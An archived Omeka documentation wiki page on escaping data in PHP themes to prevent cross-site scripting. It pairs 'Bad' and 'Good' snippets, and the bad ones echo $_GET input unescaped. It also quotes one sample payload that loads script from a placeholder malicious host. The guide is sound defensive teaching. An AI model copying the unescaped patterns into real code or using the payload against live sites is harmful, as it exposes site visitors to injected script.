<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

<title>Escaping Data &#8211; Codex &#8211; Omeka</title>



<!-- Stylesheets -->
<link rel="stylesheet" type="text/css" media="screen" href="http://omeka.org/ui/c/screen.css" />
<link rel="stylesheet" type="text/css" media="screen" href="http://omeka.org/ui/j/jquery-lightbox-0.5/css/jquery.lightbox-0.5.css" />

<!--[if IE 6]>
    <link rel="stylesheet" media="screen" href="/ui/c/ie6.css" type="text/css" />
<![endif]-->

<!--[if IE 7]>
    <link rel="stylesheet" media="screen" href="/ui/c/ie7.css" type="text/css" />
<![endif]-->

<!-- Icons -->
<link rel="shortcut icon" href="http://omeka.org/favicon.ico" />

<!-- JavaScripts -->
<script type="text/javascript" src="http://www.google.com/jsapi"></script>

<script type="text/javascript">
    google.load('jquery', '1.4.4');
    google.load('jqueryui', '1.7.3');
</script>
<script type="text/javascript" src="http://omeka.org/ui/j/jquery-lightbox-0.5/js/jquery.lightbox-0.5.min.js"></script>
<script type="text/javascript" src="http://omeka.org/ui/j/custom.js"></script>

    <!-- Wiki Head Links -->
    <meta name="generator" content="MediaWiki 1.17.5" />
<link rel="search" type="application/opensearchdescription+xml" href="http://omeka.org/c/opensearch_desc.php" title="Omeka Codex (en)" />
<link rel="EditURI" type="application/rsd+xml" href="http://omeka.org/c/api.php?action=rsd" />
<link rel="alternate" type="application/atom+xml" title="Omeka Codex Atom feed" href="http://omeka.org/c/index.php?title=Special:RecentChanges&amp;feed=atom" />
    <!-- Wiki Head Scripts -->
        <style type="text/css">/*<![CDATA[*/
.source-php {line-height: normal;}
.source-php li, .source-php pre {
	line-height: normal; border: 0px none white;
}
/**
 * GeSHi Dynamically Generated Stylesheet
 * --------------------------------------
 * Dynamically generated stylesheet for php
 * CSS class: source-php, CSS id: 
 * GeSHi (C) 2004 - 2007 Nigel McNie, 2007 - 2008 Benny Baumann
 * (http://qbnz.com/highlighter/ and http://geshi.org/)
 * --------------------------------------
 */
.php.source-php .de1, .php.source-php .de2 {font: normal normal 1em/1.2em monospace; margin:0; padding:0; background:none; vertical-align:top;}
.php.source-php  {font-family:monospace;}
.php.source-php .imp {font-weight: bold; color: red;}
.php.source-php li, .php.source-php .li1 {font-weight: normal; vertical-align:top;}
.php.source-php .ln {width:1px;text-align:right;margin:0;padding:0 2px;vertical-align:top;}
.php.source-php .li2 {font-weight: bold; vertical-align:top;}
.php.source-php .kw1 {color: #b1b100;}
.php.source-php .kw2 {color: #000000; font-weight: bold;}
.php.source-php .kw3 {color: #990000;}
.php.source-php .kw4 {color: #009900; font-weight: bold;}
.php.source-php .co1 {color: #666666; font-style: italic;}
.php.source-php .co2 {color: #666666; font-style: italic;}
.php.source-php .co3 {color: #0000cc; font-style: italic;}
.php.source-php .co4 {color: #009933; font-style: italic;}
.php.source-php .coMULTI {color: #666666; font-style: italic;}
.php.source-php .es0 {color: #000099; font-weight: bold;}
.php.source-php .es1 {color: #000099; font-weight: bold;}
.php.source-php .es2 {color: #660099; font-weight: bold;}
.php.source-php .es3 {color: #660099; font-weight: bold;}
.php.source-php .es4 {color: #006699; font-weight: bold;}
.php.source-php .es5 {color: #006699; font-weight: bold; font-style: italic;}
.php.source-php .es6 {color: #009933; font-weight: bold;}
.php.source-php .es_h {color: #000099; font-weight: bold;}
.php.source-php .br0 {color: #009900;}
.php.source-php .sy0 {color: #339933;}
.php.source-php .sy1 {color: #000000; font-weight: bold;}
.php.source-php .st0 {color: #0000ff;}
.php.source-php .st_h {color: #0000ff;}
.php.source-php .nu0 {color: #cc66cc;}
.php.source-php .nu8 {color: #208080;}
.php.source-php .nu12 {color: #208080;}
.php.source-php .nu19 {color:#800080;}
.php.source-php .me1 {color: #004000;}
.php.source-php .me2 {color: #004000;}
.php.source-php .re0 {color: #000088;}
.php.source-php .ln-xtra, .php.source-php li.ln-xtra, .php.source-php div.ln-xtra {background-color: #ffc;}
.php.source-php span.xtra { display:block; }

/*]]>*/
</style><style type="text/css">/*<![CDATA[*/
.source-html4strict {line-height: normal;}
.source-html4strict li, .source-html4strict pre {
	line-height: normal; border: 0px none white;
}
/**
 * GeSHi Dynamically Generated Stylesheet
 * --------------------------------------
 * Dynamically generated stylesheet for html4strict
 * CSS class: source-html4strict, CSS id: 
 * GeSHi (C) 2004 - 2007 Nigel McNie, 2007 - 2008 Benny Baumann
 * (http://qbnz.com/highlighter/ and http://geshi.org/)
 * --------------------------------------
 */
.html4strict.source-html4strict .de1, .html4strict.source-html4strict .de2 {font: normal normal 1em/1.2em monospace; margin:0; padding:0; background:none; vertical-align:top;}
.html4strict.source-html4strict  {font-family:monospace;}
.html4strict.source-html4strict .imp {font-weight: bold; color: red;}
.html4strict.source-html4strict li, .html4strict.source-html4strict .li1 {font-weight: normal; vertical-align:top;}
.html4strict.source-html4strict .ln {width:1px;text-align:right;margin:0;padding:0 2px;vertical-align:top;}
.html4strict.source-html4strict .li2 {font-weight: bold; vertical-align:top;}
.html4strict.source-html4strict .kw2 {color: #000000; font-weight: bold;}
.html4strict.source-html4strict .kw3 {color: #000066;}
.html4strict.source-html4strict .es0 {color: #000099; font-weight: bold;}
.html4strict.source-html4strict .br0 {color: #66cc66;}
.html4strict.source-html4strict .sy0 {color: #66cc66;}
.html4strict.source-html4strict .st0 {color: #ff0000;}
.html4strict.source-html4strict .nu0 {color: #cc66cc;}
.html4strict.source-html4strict .sc-2 {color: #404040;}
.html4strict.source-html4strict .sc-1 {color: #808080; font-style: italic;}
.html4strict.source-html4strict .sc0 {color: #00bbdd;}
.html4strict.source-html4strict .sc1 {color: #ddbb00;}
.html4strict.source-html4strict .sc2 {color: #009900;}
.html4strict.source-html4strict .ln-xtra, .html4strict.source-html4strict li.ln-xtra, .html4strict.source-html4strict div.ln-xtra {background-color: #ffc;}
.html4strict.source-html4strict span.xtra { display:block; }

/*]]>*/
</style>    


<!-- Feeds and Pingbacks -->
<link rel="alternate" type="application/rss+xml" title="Omeka Blog RSS Feed" href="../feed/index.html" />
<link rel="pingback" href="http://omeka.org/wordpress/xmlrpc.php" />

<meta name="verify-v1" content="DSZlBu0xNPDiw5xf+sUHp4v0m3SJjWNFXA3UV0H4LHc=" />
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-3026200-1']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
</head>

<body id="codex">
<div id="wrap">
    <a href="Escaping_Data.html#content" class="skip">Skip Navigation</a>
    <div id="header">
        <div class="padding">
            <a id="logo" href="../index.html"><img src="http://omeka.org/ui/i/logo-horizontal-288px.gif" alt="Omeka" width="288" height="90"></a>
            <div id="search-form">
    <form action="http://omeka.org/search" method="get">
	<input type="text" placeholder="Search Omeka.org" name="q" />
	<input type="submit" value="Search" />
    </form>
</div>
            <ul id="primary-nav" class="navigation">
                <li id="nav-showcase"><a href="../showcase.1.html">Showcase</a></li>
                <li id="nav-involved"><a href="../index.html%3Fp=124.html">Get Involved</a></li>
                <li id="nav-addons"><a href="../add-ons.1.html">Add-Ons</a></li>
                <li id="nav-forums"><a href="../forums/topic/mysqli-stmt.bind-result.html">Forums</a></li>
                <li id="nav-documentation"><a href="http://omeka.org/codex/">Documentation</a></li>
                <li id="nav-download"><a href="../download.1.html">Download</a></li>
            </ul>
        </div>
    </div>
    <div id="content">
        <div class="padding">
            

<div id="user-meta">
	<ul class="navigation">
			<li id="pt-login"><a href="http://omeka.org/c/index.php?title=Special:UserLogin&amp;returnto=Escaping&#32;Data">Log In</a></li>
	</ul>
</div>
<h1>Escaping Data</h1>
<div id="primary">
				
		
					
		<p><i>Note to theme designers</i>: Omeka themes should be secure out of the box, so theme designers who do not plan on modifying or adding PHP code to the existing themes will not need to worry about this.  However, this document details best practices for web development in general, so theme writers who are also web developers may find it useful.
</p>
<h2> <span class="mw-headline" id="The_Gist"> The Gist </span></h2>
<p>Data that comes from the user is untrustworthy.  "User data" includes both data retrieved from the database as well as input from any given user request (e.g. from the URL, form submissions, etc.).  The way to avoid problems from untrustworthy data is twofold: validating data prior to storing in the database, and escaping data properly before display.  Omeka takes care of validating data that will go into the database (though not automatically for plugins -- that is responsibility of plugin writers), but ensuring the security of displayed data is, unfortunately, the responsibility of the theme writer.  Failing to do this won't always leave your Omeka site open to attack, but under certain circumstances it will.  The only way to prevent problems for certain is to make sure that data is escaped properly before display.
</p>
<h2> <span class="mw-headline" id="What_could_possibly_go_wrong.3F"> What could possibly go wrong? </span></h2>
<p>Just for example, suppose you have a theme that displays the search query for which results are being displayed, and the code currently looks like this:
</p>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1">Search Results for: <span class="kw2">&lt;?php</span> <span class="kw1">echo</span> <span class="re0">$_GET</span><span class="br0">&#91;</span><span class="st_h">'search'</span><span class="br0">&#93;</span><span class="sy0">;</span> <span class="sy1">?&gt;</span></pre></div></div>
<h2> <span class="mw-headline" id="How_XSS_Attacks_Work"> How XSS Attacks Work </span></h2>
<p>If someone did a search for: &lt;script src="my-evil-site.com/bad.js"&gt;&lt;/script&gt;, that search query is stored in $_GET['search'], so that bad HTML would be injected directly into the search results page, and the evil javascript would run.  Then the attacker could send some 3rd party a link to those search results, and when that third person followed the link, they would be compromised by the bad javascript.
</p>
<h2> <span class="mw-headline" id="How_to_Prevent_These_Attacks"> How to Prevent These Attacks </span></h2>
<p>Omeka has a set of helper functions that need to be used in situations such as this.  The most important of these is html_escape(), which basically translates a PHP value into valid HTML by encoding HTML entities so that &lt; becomes &amp;lt;, &gt; becomes &amp;gt;, etc.  PHP developers will recognize the similarity to PHP's builtin htmlentities() function, which is basically what this is, with the added ability for plugins to filter the output if necessary. 
</p><p>The previous example could be corrected by wrapping the $_GET parameter in html_escape(), like so:
</p>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1">Search Results for: <span class="kw2">&lt;?php</span> <span class="kw1">echo</span> html_escape<span class="br0">&#40;</span><span class="re0">$_GET</span><span class="br0">&#91;</span><span class="st_h">'search'</span><span class="br0">&#41;</span><span class="sy0">;</span> <span class="sy1">?&gt;</span></pre></div></div>
<h2> <span class="mw-headline" id="Why_Doesn.27t_Omeka_Do_This_Automatically.3F"> Why Doesn't Omeka Do This Automatically? </span></h2>
<p>There are a few complicated reasons why the current version of Omeka can't escape all data automatically for theme writers, most of which has to do with the fact that there seems to be no one-size-fits-all solution for this type of problem.  That said, we're looking into possible solutions for future releases that would make this easier.  Users are welcome to contribute suggestions on the dev mailing list.
</p>
<h2> <span class="mw-headline" id="Caveats"> Caveats </span></h2>
<p>Not everything in a theme needs to be (nor should be) escaped using html_escape().  Important counterexamples include helper functions that generate HTML, e.g. auto_discovery_link_tag(), link_to(), etc.  Also, the output of certain functions like item() should not be escaped, as that is taken care of automatically based on whether or not the field was marked as HTML in the admin. 
</p><p>In addition, this may seem obvious, but pretty much any data over which the theme designer has control does not need to be escaped.  For example, escaping literal strings, such as the following, is pointless:  
</p>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1"><span class="kw2">&lt;?php</span> <span class="kw1">echo</span> html_escape<span class="br0">&#40;</span><span class="st_h">'cookies &amp; cream'</span><span class="br0">&#41;</span><span class="sy0">;</span> <span class="sy1">?&gt;</span></pre></div></div>  
<p>Instead, it should just be: 
</p>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="html4strict source-html4strict"><pre class="de1">cookies <span class="sc1">&amp;amp;</span> cream</pre></div></div>
<h2> <span class="mw-headline" id="Useful_Examples_of_When_to_Escape_Data"> Useful Examples of When to Escape Data </span></h2>
<h3> <span class="mw-headline" id="User_Input"> User Input </span></h3>
<p>Superglobals like $_REQUEST, $_GET, $_POST, and $_SERVER should always be escaped before display.       
</p>
<ul><li> Bad:
</li></ul>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1">Search terms: <span class="kw2">&lt;?php</span> <span class="kw1">echo</span> <span class="re0">$_GET</span><span class="br0">&#91;</span><span class="st_h">'search'</span><span class="br0">&#93;</span><span class="sy0">;</span> <span class="sy1">?&gt;</span></pre></div></div>
<ul><li> Good:
</li></ul>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1">Search terms: <span class="kw2">&lt;?php</span> <span class="kw1">echo</span> html_escape<span class="br0">&#40;</span><span class="re0">$_GET</span><span class="br0">&#91;</span><span class="st_h">'search'</span><span class="br0">&#93;</span><span class="br0">&#41;</span><span class="sy0">;</span> <span class="sy1">?&gt;</span></pre></div></div>
<h3> <span class="mw-headline" id="From_Database"> From Database </span></h3>
<ul><li> Bad: 
</li></ul>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1">Welcome, <span class="kw2">&lt;?php</span> <span class="kw1">echo</span> current_user<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">-&gt;</span><span class="me1">first_name</span><span class="sy0">;</span> <span class="sy1">?&gt;</span></pre></div></div>
<ul><li> Good:
</li></ul>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1">Welcome, <span class="kw2">&lt;?php</span> <span class="kw1">echo</span> html_escape<span class="br0">&#40;</span>current_user<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">-&gt;</span><span class="me1">first_name</span><span class="br0">&#41;</span><span class="sy0">;</span> <span class="sy1">?&gt;</span></pre></div></div>
<h3> <span class="mw-headline" id="URLs"> URLs </span></h3>
<p>In HTML, "href" and "src" attributes must always contain a URL that is properly escaped. 
</p>
<ul><li> Bad:
</li></ul>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1">&lt;a href=&quot;<span class="kw2">&lt;?php</span> <span class="kw1">echo</span> uri<span class="br0">&#40;</span><span class="st_h">'items/browse'</span><span class="br0">&#41;</span><span class="sy0">;</span> <span class="sy1">?&gt;</span>&quot;&gt;Go to Items&lt;/a&gt;</pre></div></div>
<ul><li> Good:
</li></ul>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1">&lt;a href=&quot;<span class="kw2">&lt;?php</span> <span class="kw1">echo</span> html_escape<span class="br0">&#40;</span>uri<span class="br0">&#40;</span><span class="st_h">'items/browse'</span><span class="br0">&#41;</span><span class="br0">&#41;</span><span class="sy0">;</span> <span class="sy1">?&gt;</span>&quot;&gt;Go to Items&lt;/a&gt;</pre></div></div>
<ul><li> Better:
</li></ul>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1"><span class="kw2">&lt;?php</span> <span class="kw1">echo</span> link_to<span class="br0">&#40;</span><span class="st_h">'items'</span><span class="sy0">,</span> <span class="st_h">'browse'</span><span class="sy0">,</span> <span class="st_h">'Go to Items'</span><span class="br0">&#41;</span><span class="sy0">;</span> <span class="sy1">?&gt;</span></pre></div></div>  
<p>Also, URL query string parameters must be properly encoded with urlencode() before they are escaped.
</p>
<ul><li> Bad:
</li></ul>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1">&lt;a href=&quot;<span class="kw2">&lt;?php</span> <span class="kw1">echo</span> uri<span class="br0">&#40;</span><span class="st_h">'items/browse?tags='</span> <span class="sy0">.</span> <span class="re0">$tag</span><span class="br0">&#41;</span><span class="sy0">;</span> <span class="sy1">?&gt;</span>&quot;&gt;</pre></div></div>
<ul><li> Good:
</li></ul>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1">&lt;a href=&quot;<span class="kw2">&lt;?php</span> <span class="kw1">echo</span> html_escape<span class="br0">&#40;</span>uri<span class="br0">&#40;</span><span class="st_h">'items/browse?tags='</span> <span class="sy0">.</span> <span class="kw3">urlencode</span><span class="br0">&#40;</span><span class="re0">$tag</span><span class="br0">&#41;</span><span class="br0">&#41;</span><span class="br0">&#41;</span><span class="sy0">;</span> <span class="sy1">?&gt;</span>&quot;&gt;</pre></div></div>
<ul><li> Better: 
</li></ul>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1">&lt;a href=&quot;<span class="kw2">&lt;?php</span> <span class="kw1">echo</span> html_escape<span class="br0">&#40;</span>uri<span class="br0">&#40;</span><span class="st_h">'items/browse'</span><span class="sy0">,</span> <span class="kw3">array</span><span class="br0">&#40;</span><span class="st_h">'tags'</span><span class="sy0">=&gt;</span><span class="re0">$tag</span><span class="br0">&#41;</span><span class="br0">&#41;</span><span class="br0">&#41;</span><span class="sy0">;</span> <span class="sy1">?&gt;</span>&quot;&gt;</pre></div></div>
<h3> <span class="mw-headline" id="Javascript_and_XML"> Javascript and XML </span></h3>
<p>For developers writing javascript and XML, Omeka has 2 functions (since Omeka 1.1) for escaping data: js_escape() and xml_escape().  These are necessary because the behavior of html_escape() is not necessarily desirable (or valid) for translating from PHP to Javascript or XML.  Basically, any context for using html_escape() in a theme applies also to js_escape() or xml_escape().
</p>
<ul><li> Bad Example in Javascript:
</li></ul>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1">new Ajax.Request(&quot;<span class="kw2">&lt;?php</span> <span class="kw1">echo</span> uri<span class="br0">&#40;</span><span class="st0">&quot;items/change-type&quot;</span><span class="br0">&#41;</span> <span class="sy1">?&gt;</span>&quot;);</pre></div></div>           
<ul><li> How it should be done:
</li></ul>
<div dir="ltr" class="mw-geshi mw-content-ltr"><div class="php source-php"><pre class="de1">new Ajax.Request(<span class="kw2">&lt;?php</span> <span class="kw1">echo</span> js_escape<span class="br0">&#40;</span>uri<span class="br0">&#40;</span><span class="st0">&quot;items/change-type&quot;</span><span class="br0">&#41;</span><span class="br0">&#41;</span> <span class="sy1">?&gt;</span>);</pre></div></div>

<!-- 
NewPP limit report
Preprocessor node count: 175/1000000
Post-expand include size: 0/2097152 bytes
Template argument size: 0/2097152 bytes
Expensive parser function count: 0/100
-->
<div class="printfooter">
Retrieved from "<a href="Escaping_Data.html">http://omeka.org/codex/Escaping_Data</a>"</div>
			
				<p id="categories"><div id='catlinks' class='catlinks catlinks-allhidden'></div></p>
					
	</div>
	<div id="secondary">
	<div class="portlet">
		<h2>Documentation</h2>
		<ul>
			<li><a href="http://omeka.org/codex/">Home</a></li>
			<li><a href="http://omeka.org/codex/Screencasts">Screencasts</a></li>
			<li><a href="http://omeka.org/codex/Managing_Themes_2.0">Themes</a></li>
			<li><a href="http://omeka.org/codex/Managing_Appearance_2.0">Appearance</a></li>
			<li><a href="http://omeka.org/codex/Plugins2.0">Plugins</a></li>
		</ul>
	</div>
	<div class="portlet">
		<h2>Page View</h2>
			<ul id="codex-views">
					<li id="nav-page"><a href="Escaping_Data.html">Page</a></li>
					<li id="nav-discussion"><a href="http://omeka.org/c/index.php?title=Talk:Escaping_Data&amp;action=edit&amp;redlink=1">Discussion</a></li>
					<li id="nav-view_source"><a href="http://omeka.org/c/index.php?title=Escaping_Data&amp;action=edit">View source</a></li>
					<li id="nav-history"><a href="http://omeka.org/c/index.php?title=Escaping_Data&amp;action=history">History</a></li>
				</ul>
	</div>
	
	<div class="portlet" id="wiki-toolbox">
		<h2>Toolbox</h2>
			<ul>
				<li id="t-whatlinkshere"><a href="Special:WhatLinksHere/Escaping_Data.html">What links here</a></li>
				<li id="t-recentchangeslinked"><a href="Special:RecentChangesLinked/Escaping_Data.html">Related changes</a></li>
<li id="t-specialpages"><a href="http://omeka.org/codex/Special:SpecialPages">Special pages</a></li>
			</ul>
			
	</div>
	<a rel="license" href="http://creativecommons.org/licenses/by/3.0/us/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by/3.0/us/88x31.png" /></a><br />Omeka Documentation is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/3.0/us/">Creative Commons Attribution 3.0 United States License</a>.
</div>
	</div>
</div>	
	<div id="footer">
		<div class="padding">
			<div id="sitemap">
				<div class="section">
				<h3>About</h3>
					<ul>
						<li><a href="../index.html%3Fp=2.html">Project</a></li>
						<li><a href="../index.html%3Fp=3.html">Staff</a></li>
						<li><a href="../blog.1.html">News</a></li>
            			<li><a href="http://www.gnu.org/copyleft/gpl.html">License</a></li>
					</ul>
				</div>
				<div class="section">
				<h3>Help</h3>
					<ul>
						<li><a href="../forums/topic/mysqli-stmt.bind-result.html">User Forums</a></li>
						<li><a href="http://omeka.org/codex/">Documentation</a></li>
						<li><a href="http://groups.google.com/group/omeka-dev">Dev Listserv</a></li>
						<li><a href="http://omeka.org/contact/">Contact</a></li>
						
					</ul>
				</div>
				<div class="section">
				<h3>Downloads</h3>
					<ul>
						<li><a href="../download.1.html">Download Omeka</a></li>
						<li><a href="../plugins.html">Plugins</a></li>
						<li><a href="../download/themes/index.html">Themes</a></li>
						<li><a href="../index.html%3Fp=222.html">Packages</a></li>
					</ul>
				</div>
			</div>
			<div id="chnm-meta">
			<a href="http://chnm.gmu.edu" id="chnm-logo"><img alt="Roy Rosenzweig Center for History and New Media" src="http://omeka.org/ui/i/rrchnm-logo-regular.gif" /></a>

			<p>Omeka is a project of the <a href="http://chnm.gmu.edu">Roy Rosenzweig Center for History and New Media</a>, <a href="http://www.gmu.edu">George Mason University</a>. Copyright &copy; 2007&ndash;2016 <abbr title="Center for History and New Media">CHNM</abbr>.</p>
			</div>
		</div>
	</div></div>

</body>

<script src="http://omeka.org/c/load.php?debug=false&amp;lang=en&amp;modules=startup&amp;only=scripts&amp;skin=omeka&amp;*"></script>
<script>if ( window.mediaWiki ) {
	mediaWiki.config.set({"wgCanonicalNamespace": "", "wgCanonicalSpecialPageName": false, "wgNamespaceNumber": 0, "wgPageName": "Escaping_Data", "wgTitle": "Escaping Data", "wgAction": "view", "wgArticleId": 345, "wgIsArticle": true, "wgUserName": null, "wgUserGroups": ["*"], "wgCurRevisionId": 3792, "wgCategories": [], "wgBreakFrames": false, "wgRestrictionEdit": [], "wgRestrictionMove": []});
}
</script>
<script>if ( window.mediaWiki ) {
	mediaWiki.loader.load(["mediawiki.util", "mediawiki.legacy.wikibits", "mediawiki.legacy.ajax"]);
	mediaWiki.loader.go();
}
</script>

<script>if ( window.mediaWiki ) {
	mediaWiki.user.options.set({"ccmeonemails":0,"cols":80,"contextchars":50,"contextlines":5,"date":"default","diffonly":0,"disablemail":0,"disablesuggest":0,"editfont":"default","editondblclick":0,"editsection":1,"editsectiononrightclick":0,"enotifminoredits":0,"enotifrevealaddr":0,"enotifusertalkpages":1,"enotifwatchlistpages":0,"extendwatchlist":0,"externaldiff":0,"externaleditor":0,"fancysig":0,"forceeditsummary":0,"gender":"unknown","hideminor":0,"hidepatrolled":0,"highlightbroken":1,"imagesize":1,"justify":0,"math":1,"minordefault":0,"newpageshidepatrolled":0,"nocache":0,"noconvertlink":0,"norollbackdiff":0,"numberheadings":0,"previewonfirst":0,"previewontop":1,"quickbar":1,"rcdays":7,"rclimit":50,"rememberpassword":0,"rows":25,"searchlimit":20,"showhiddencats":0,"showjumplinks":1,"shownumberswatching":1,"showtoc":1,"showtoolbar":1,"skin":"omeka","stubthreshold":0,"thumbsize":2,"underline":2,"uselivepreview":0,"usenewrc":0,"watchcreations":0,"watchdefault":0,"watchdeletion":0,
	"watchlistdays":3,"watchlisthideanons":0,"watchlisthidebots":0,"watchlisthideliu":0,"watchlisthideminor":0,"watchlisthideown":0,"watchlisthidepatrolled":0,"watchmoves":0,"wllimit":250,"variant":"en","language":"en","searchNs0":true,"searchNs1":false,"searchNs2":false,"searchNs3":false,"searchNs4":false,"searchNs5":false,"searchNs6":false,"searchNs7":false,"searchNs8":false,"searchNs9":false,"searchNs10":false,"searchNs11":false,"searchNs12":false,"searchNs13":false,"searchNs14":false,"searchNs15":false});;mediaWiki.loader.state({"user.options":"ready"});
}
</script></html>
